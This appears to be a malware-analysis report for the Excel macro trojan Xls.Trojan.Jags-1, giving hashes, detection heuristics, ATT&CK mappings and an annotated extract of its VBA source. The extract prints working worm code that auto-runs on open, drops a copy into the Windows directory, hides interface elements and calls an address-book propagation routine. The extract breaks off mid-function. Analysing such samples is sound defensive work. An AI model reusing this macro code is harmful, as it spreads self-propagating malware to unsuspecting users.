Xls.Trojan.Jags-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 f33476bf52293e10…

MALICIOUS

Office (OLE)

97.0 KB Created: 1999-11-25 00:52:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 8ae57ee5a966d1a7114113d441d1eec9 SHA-1: d5095c4955c0483448a80b7d49333adcecab52ff SHA-256: f33476bf52293e1040f7e9e2e456045ddaed12874839e1b6563c954a29186976
Risk Score: 260

Malware Insights

Xls.Trojan.Jags-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The critical ClamAV detections indicate this is a known malicious Excel macro trojan, likely Jags. The Workbook_Open macro is designed to execute VBA code upon opening, which includes calls to CreateObject and saving a copy of the workbook to the Windows directory. This suggests an attempt to establish persistence and potentially download or execute a second-stage payload. The extracted source below also shows Initialize calling Read_Your_BookAddress under the original comment "ENVIAMOS EL GUSANO" ("we send the worm"), which suggests self-propagation through the victim's address book in addition to the local copy.

Heuristics 5

  • ClamAV: Xls.Trojan.Jags-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jags-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic catches macro documents whose VBA exists only as p-code, or whose source extraction failed, so that no visible source is available.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30551 bytes
SHA-256: 3a3de0f4848e8272718cc7bb0fa79345e5e0021c342981b2319713f2c87559ff
Detection
ClamAV: Xls.Trojan.Jags-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
' Module header of the workbook's own code module. Workbook_Open (below) lives here,
' which is why the document runs code on open without any user action.
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub happyBirthday()
' Cosmetic "payload": called from Initialize. Only when the current day of the
' month is 17 it writes a birthday message into Worksheets(1) cells A7 and A6
' and enlarges the A6 font. Errors are swallowed by On Error Resume Next.
On Error Resume Next

If Day(Now()) = 17 Then
 Worksheets(1).Cells(7, 1).Value = "Colombia, September 17, 1978.."
 Worksheets(1).Cells(6, 1).Value = "Happy Birthday to my brother Christiam (CJGS)"
 With Worksheets(1).Cells(6, 1).Font
    .Name = "Arial"
    .Size = 20
 End With
End If
End Sub


Sub Initialize()
' Infection entry point, reached from Workbook_Open only when no .xls file
' already exists in the Windows directory. Every statement runs under
' On Error Resume Next, so any failing step is silent.
On Error Resume Next

' Original comment: "our polymorphic technique" -- drops a copy of the active
' workbook as <Windows dir>\<current user name>.xls (paths from OBTENER_DIR_WINDOWS
' and UsuarioActual, both defined later in this extraction).
Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
' Original comment: "show the message afterwards, so it is not saved by SaveCopyAs"
Call happyBirthday
' Original comment: "disable these to get in" -- UNLOAD_HOTKEYS, Ocultar_Barra
' ("hide bar") and ASOCIAR_JAGS90 are not in this excerpt of the source.
Call UNLOAD_HOTKEYS
Call Ocultar_Barra
Call ASOCIAR_JAGS90
Call Read_Your_BookAddress 'Original comment: "WE SEND THE WORM" -- propagation routine, module read_address_book (truncated in this excerpt)
' Original comment: "re-enable so as not to leave suspicion"
Call LOAD_HOTKEYS
Call Mostrar_Barra
End Sub

Private Sub Workbook_Open()
' Auto-executes when the workbook is opened (OLE_VBA_WBOPEN finding above).
' Dir() with vbArchive looks for any .xls in the Windows directory; if none is
' found, Initialize runs (drop + propagation). Presumably the dropped
' <user>.xls doubles as an "already infected" marker -- inferred from the check.
 If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
   Call Initialize
 End If
 
' A form is shown afterwards regardless of the branch taken; UserForm1 is not in this excerpt.
 UserForm1.Show
End Sub

Attribute VB_Name = "Hoja1"
' Sheet module ("Hoja" = sheet). Holds only an empty SelectionChange handler.
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Empty event handler; no behaviour.
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)

End Sub

Attribute VB_Name = "Hoja2"
' Sheet module with no code.
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja3"
' Sheet module with no code.
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "get_win_directory"
'GET THE WINDOWS DIRECTORY (original comment)
' Win32 import used by OBTENER_DIR_WINDOWS below; the ANSI variant is declared.
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Function OBTENER_DIR_WINDOWS() As String
' Returns the Windows directory path (e.g. the drop location used by Initialize).
' Fills a 300-byte NUL buffer via GetWindowsDirectoryA and cuts it at the first NUL.
' The API return value (ret) is never checked; with On Error Resume Next a buffer
' without any NUL would make Left$ fail silently and the function return "".
On Error Resume Next

'GET WINDOWS DIR (original comment)
Dim WinDir As String
Dim Cadena As String
Dim ret As Long

'WE GET THE DIR (original comment)
    Cadena = String$(300, Chr$(0))
    ret = GetWindowsDirectory(Cadena, Len(Cadena))
    WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1)
    
    OBTENER_DIR_WINDOWS = WinDir

End Function



Attribute VB_Name = "get_win_user"
'TO GET THE WINDOWS USER NAME (original comment)
' Win32 import used by UsuarioActual below; nSize is passed ByRef so the API can
' write back the length.
Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long

'GETS THE NAME OF THE CURRENT WINDOWS USER (original comment)

Public Function UsuarioActual() As String
' Returns the current Windows user name; used by Initialize to name the dropped
' copy (<user>.xls). Calls GetUserNameA with a 260-char buffer, keeps lSize
' characters (lSize is updated ByRef by the API), then strips everything from
' the first NUL. Falls back to Excel's Application.UserName when lSize is 0.
' The API's return value is ignored.
    On Error Resume Next
    
    Dim sBuffer As String
    Dim lSize As Long
    Dim sUsuario As String
    
    sBuffer = Space$(260)
    lSize = Len(sBuffer)
    Call GetUserName(sBuffer, lSize)
    If lSize > 0 Then
        sUsuario = Left$(sBuffer, lSize)
        'Remove the trailing CHR$(0)... (original comment)
        lSize = InStr(sUsuario, Chr$(0))
        If lSize Then
            sUsuario = Left$(sUsuario, lSize - 1)
        End If
    Else
        sUsuario = Application.UserName
    End If
    UsuarioActual = sUsuario
End Function



Attribute VB_Name = "jags90_others"
'gets the name of the #$#%# database (original comment; nothing in this
'excerpt of the module actually touches a database -- it holds the random
'name helpers aleatorio and PolyName)


Function aleatorio(hasta As Integer) As Long
' "aleatorio" = random. Sums hasta draws of Rnd() (each in [0,1)), reseeding
' with Randomize on every iteration, and returns the sum converted to Long,
' so the result is roughly in 0..hasta. Used by PolyName for name length and
' letter selection. Note: x and num are Variants (no explicit type).
Dim x, num
num = 0

  For x = 1 To hasta
    Randomize
    num = num + Rnd()
  Next x
  
  aleatorio = num
End Function

Function PolyName() As String
' Builds a pseudo-random uppercase-ish name of 1..13 characters: length is
' aleatorio(12)+1, each character is Chr(aleatorio(23)+64), i.e. codes 64..87
' ('@' through 'W'). The 19-space buffer is overwritten in place with Mid$ and
' returned with its trailing spaces intact. Detection note: names produced this
' way have no fixed value, so match on behaviour (drop path, macro structure)
' rather than on the generated string.
 Dim texto, x, hasta
 hasta = aleatorio(12) + 1
 texto = "                   "
 
 For x = 1 To hasta
   Mid$(texto, x, 1) = Chr(aleatorio(23) + 64)
 Next x
 
 PolyName = texto
End Function


Attribute VB_Name = "read_address_book"

 Function PolyBody() As S
... (truncated)